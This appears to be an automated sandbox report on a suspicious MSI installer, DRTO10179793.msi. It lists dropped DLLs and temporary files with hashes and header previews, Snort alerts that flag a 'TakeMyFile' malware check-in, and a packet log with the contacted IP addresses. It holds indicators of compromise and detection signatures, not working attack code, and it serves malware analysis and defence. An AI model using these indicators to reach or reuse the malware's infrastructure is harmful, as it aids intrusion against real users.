File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	878560
Entropy (8bit):	6.452749824306929
Encrypted:	false
SSDEEP:	24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
MD5:	D51A7E3BCE34C74638E89366DEEE2AAB
SHA1:	0E68022B52C288E8CDFFE85739DE1194253A7EF0
SHA-256:	7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
SHA-512:	8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........\|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI96CA.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9796.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9E0F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	388064
Entropy (8bit):	6.407392408414975
Encrypted:	false
SSDEEP:	6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
MD5:	20C782EB64C81AC14C83A853546A8924
SHA1:	A1506933D294DE07A7A2AE1FBC6BE468F51371D6
SHA-256:	0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
SHA-512:	AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9F39.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA092.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2393
Entropy (8bit):	5.775253393245349
Encrypted:	false
SSDEEP:	48:HfQPYxiyTiTfpjTOYD8SUnGTATkeqanhGnnYTTQnYnYvqEnYRsrBCX:H7iOwUMeHbsN+
MD5:	084359FB8D16090EF770D2B180EE838F
SHA1:	9CE0AFD83B92743C62BF3D5D6DF44A34EC567424
SHA-256:	6F3ABCD51AD12B9BA64A5CDE7B6F12F44EF7D855F0EEEBB4E95D1015CC047546
SHA-512:	8E58342B525F874744AF79F9E22897CEE05D2CC658EC82F731F1BBB82608042E57939DBF64D4C0E136209BED1B2D4EE6E2B07B02FEF2E4A5587F7FD2284CBACB
Malicious:	false
Preview:	...@IXOS.@.....@..#V.@.....@.....@.....@.....@.....@......&.{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}..Companhia DIGITAL A.C.T..DRTO10179793.msi.@.....@.....@.....@........&.{94413F4E-8038-4F75-8820-D526BDEA5DB7}.....@.....@.....@.....@.......@.....@.....@.......@......Companhia DIGITAL A.C.T......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{A79610FE-54C3-458A-B94E-BD8C27ADA02F}S.C:\Users\user\AppData\Roaming\Companhia DIGITAL A.C.T\Companhia DIGITAL A.C.T\.@.......@.....@.....@......&.{6959BDEE-9B16-4294-84EA-0854CE48DA3B}D.01:\Software\Companhia DIGITAL A.C.T\Companhia DIGITAL A.C.T\Version.@.......@.....@.....@......&.{707E90D8-A51C-4CB8-ADB3-252AD031B13E}X.01:\Software\Companhia DIGITAL A.C.T\{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".S.C:\Users\user\AppData\Roa

C:\Windows\Installer\MSIA577.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	780768
Entropy (8bit):	6.387720196228063
Encrypted:	false
SSDEEP:	12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
MD5:	573F5E653258BF622AE1C0AD118880A2
SHA1:	E243C761983908D14BAF6C7C0879301C8437415D
SHA-256:	371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
SHA-512:	DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{4DF19C06-EB1F-4F8C-9FDD-36EBD6FE502E}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1657627822141658
Encrypted:	false
SSDEEP:	12:JSbX72FjbAGiLIlHVRpLh/7777777777777777777777777vDHFc/+bhBFi0l0i5:JVQI5PaYnFcF
MD5:	5CB33C02CB5F45736E455E5447F30FB2
SHA1:	0F8D4B117A4671D173686573924A4650FE7B7F0F
SHA-256:	8B51BA593E666E89A687C43933E4A606E4F21AEF0FD31BB4D1E5140A628CA42D
SHA-512:	0A28D5E990AC83CFD788EB6533CAEDF78DBC5E1677128BF85A3EED414B0C235FD57BE4A318A1486931E721787172D1024612D28A0E8C5B29989C28048A7E8F67
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8846292597159384
Encrypted:	false
SSDEEP:	96:ChF1rnTTp16OERGrERDZlCc0pk87K4GGERGrERXg+i:K1jf+QDGG
MD5:	90C2929406F99B3912546C16E000F0F8
SHA1:	CE31ADCDF8CCA3ED180AE94F99671A734C008C6B
SHA-256:	EA6D7F59C72409B86B8B2041763F839FACCBAB6373CE093D8487F1F95FD07A91
SHA-512:	B95228D630C4189CEC498604A768837AF8E381261BD245F19E205871CDFBD5D6D7A039913DB860C1F2F0E5354AC018CCD747107AB7062754BFECE09B6F75A10A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	174137
Entropy (8bit):	5.355145176704019
Encrypted:	false
SSDEEP:	768:2JcfxyJbOd+nInu0SXmV9UmtiBMwM5CSXKqqQMxlqNYL/AxVDTAMOfbDj/nCwpTQ:2JcI4n9Umtipi5Qctdr
MD5:	339FF8976DFCE308DA29485695EA9E43
SHA1:	6CFBBE5E294384B2A04B4F56BF4CF13353457B93
SHA-256:	70C8EE7AD578E4CD3D01F9264D627931F046667B951D39EF34AC05235E346415
SHA-512:	9557F58FAAA4620982BD0CDB68DEF2DEA2A39FFC3B27B06CED45FAE34CA00B3BE47D255BEE5EB3F47C2F7F9AE956449ADC2E68590897F750C292E48BD378FD55
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 11:01:23.494 [4132]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.494 [4132]: ngen returning 0x00000000..07/23/2020 11:01:23.541 [2300]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.557 [2300]: ngen returning 0x00000000..07/23/2020 11:01:23.603 [5144]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3

C:\Windows\Temp\~DF16CA8FA46E5FBD0B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8846292597159384
Encrypted:	false
SSDEEP:	96:ChF1rnTTp16OERGrERDZlCc0pk87K4GGERGrERXg+i:K1jf+QDGG
MD5:	90C2929406F99B3912546C16E000F0F8
SHA1:	CE31ADCDF8CCA3ED180AE94F99671A734C008C6B
SHA-256:	EA6D7F59C72409B86B8B2041763F839FACCBAB6373CE093D8487F1F95FD07A91
SHA-512:	B95228D630C4189CEC498604A768837AF8E381261BD245F19E205871CDFBD5D6D7A039913DB860C1F2F0E5354AC018CCD747107AB7062754BFECE09B6F75A10A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF29A74FEED2DC8FF0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2337694492672644
Encrypted:	false
SSDEEP:	96:Q9HHT388Qp16OERGrERDZlCc0pk87K4GGERGrERXg+i:yHHzRY+QDGG
MD5:	E4DBAEFFA652D230F6BC79CA7E71242D
SHA1:	59308DEABB3931779855718247C72FBD46EFAFFA
SHA-256:	B06C38C0DE9CCF4ABC957BF8D1AA4484A7B5295976F94C779DD3BA66EEBA5FFE
SHA-512:	587B438AAAD54F4A0C4EDD78AD0A90195002EA718C80CF23655771D1F1826BF841A26C3B273C3171F07B2E53275B348E12DFEC65A05F27CCEBFAFB5853CCC1F9
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2B52415074CA5C03.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2337694492672644
Encrypted:	false
SSDEEP:	96:Q9HHT388Qp16OERGrERDZlCc0pk87K4GGERGrERXg+i:yHHzRY+QDGG
MD5:	E4DBAEFFA652D230F6BC79CA7E71242D
SHA1:	59308DEABB3931779855718247C72FBD46EFAFFA
SHA-256:	B06C38C0DE9CCF4ABC957BF8D1AA4484A7B5295976F94C779DD3BA66EEBA5FFE
SHA-512:	587B438AAAD54F4A0C4EDD78AD0A90195002EA718C80CF23655771D1F1826BF841A26C3B273C3171F07B2E53275B348E12DFEC65A05F27CCEBFAFB5853CCC1F9
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4B6D4B9BD137BC03.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07270022159287408
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOc/+RkahBFcxtIVky6l0:2F0i8n0itFzDHFc/+bhBFi0
MD5:	84A775A2AE5AEA80195805646B7FB397
SHA1:	5E8A790FB7E134387A50CCF2F0B484FA8C1749BF
SHA-256:	6A28A5FC53DF34FB0BAC2A2F5DF42815B470E27DE7E56C5E81FC2516AED705C4
SHA-512:	22514F503CC430286BC4625EFD70C51142D2E699A8B4AC6EC679B8F38DD2B98D2D9B5FE8F8956317A1BC9AF34F11A4D7079EEBB969D61B4A3AE71B24E866BC9F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5BFBA27B8A872811.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.8846292597159384
Encrypted:	false
SSDEEP:	96:ChF1rnTTp16OERGrERDZlCc0pk87K4GGERGrERXg+i:K1jf+QDGG
MD5:	90C2929406F99B3912546C16E000F0F8
SHA1:	CE31ADCDF8CCA3ED180AE94F99671A734C008C6B
SHA-256:	EA6D7F59C72409B86B8B2041763F839FACCBAB6373CE093D8487F1F95FD07A91
SHA-512:	B95228D630C4189CEC498604A768837AF8E381261BD245F19E205871CDFBD5D6D7A039913DB860C1F2F0E5354AC018CCD747107AB7062754BFECE09B6F75A10A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6CB6C88574AEC173.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.32571147775433773
Encrypted:	false
SSDEEP:	96:Iil2zERGrERDERGrERDZlCc0pk87K4GtgNE:oO+QDG
MD5:	142C75B686CD540CADE20909639624C8
SHA1:	B001377EA2AFE15FF60EF01B1AA91A6CFF9586E6
SHA-256:	0914154D23BAA1ED5F50C432EC273879D69B757C4AC91674782B25D2827F96DF
SHA-512:	F0C0121A0A7A18E546EBF515D76259F304825B3C8F949E3F8D2E0125CD219DF7926CA60026B2F9DCAE660F996CF2328825E11905FB44C4A4875A74CDA395C0DE
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAB8605BE41AFD47D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC26869D783DF2722.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2337694492672644
Encrypted:	false
SSDEEP:	96:Q9HHT388Qp16OERGrERDZlCc0pk87K4GGERGrERXg+i:yHHzRY+QDGG
MD5:	E4DBAEFFA652D230F6BC79CA7E71242D
SHA1:	59308DEABB3931779855718247C72FBD46EFAFFA
SHA-256:	B06C38C0DE9CCF4ABC957BF8D1AA4484A7B5295976F94C779DD3BA66EEBA5FFE
SHA-512:	587B438AAAD54F4A0C4EDD78AD0A90195002EA718C80CF23655771D1F1826BF841A26C3B273C3171F07B2E53275B348E12DFEC65A05F27CCEBFAFB5853CCC1F9
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD27F4FD835A6D51B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE35C2F7FE5DF8214.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF64F33F2D15C9242.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF82B15174A98844A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {94413F4E-8038-4F75-8820-D526BDEA5DB7}, Number of Words: 10, Subject: Companhia DIGITAL A.C.T, Author: Companhia DIGITAL A.C.T, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: Companhia DIGITAL A.C.T, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	6.622017626804443
TrID:	Microsoft Windows Installer (77509/1) 52.18% Windows SDK Setup Transform Script (63028/2) 42.43% Generic OLE2 / Multistream Compound File (8008/1) 5.39%
File name:	DRTO10179793.msi
File size:	3409408
MD5:	32c752eed98197d9d401a1054bd39009
SHA1:	55371da49cc341e585735c2616c26676c8a95a56
SHA256:	03e6328bcd5a3e48de00c5512d47d2e11c652348aad299d118e9063142d8aff0
SHA512:	82cb48d02e0660d995a63ad37cab022d5972ccd61bb4cc1e608687fd08556d27817128fde8303e5838306bb8d547bd7fa9106ab6c4d8fcaaa2a36ff12dade98e
SSDEEP:	49152:EiDxGSFVtaNXAZK8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBZWsRkn4frUMXjDtc:dxMXA9Kknz5vquVsRe4frUMXjTY
TLSH:	76F52B0532C9A571D75F9A7A7A3BE1F5F17A2DD123A000CBB3547C58E8B0385A6A1F32
File Content Preview:	........................>...................5...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T..................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.754.205.202.3149713802849813 01/03/23-16:29:51.133243	TCP	2849813	ETPRO MALWARE TakeMyFile Installer Checkin	49713	80	192.168.2.7	54.205.202.31
192.168.2.754.205.202.3149713802849814 01/03/23-16:29:51.133243	TCP	2849814	ETPRO MALWARE TakeMyFile User-Agent	49713	80	192.168.2.7	54.205.202.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2023 16:29:18.796051979 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:18.796103954 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:18.796175957 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:18.817631960 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:18.817675114 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.282445908 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.282629013 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.286269903 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.286307096 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.286689043 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.496186018 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.523343086 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.523389101 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690010071 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690191984 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690218925 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690274000 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690311909 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.690314054 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690332890 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690352917 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.690361023 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690407038 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.690414906 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.690443039 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.730345964 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:19.835731030 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.835875988 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.835896969 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.835939884 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.835958004 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.835973024 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:19.836030960 CET	443	49710	3.5.17.120	192.168.2.7
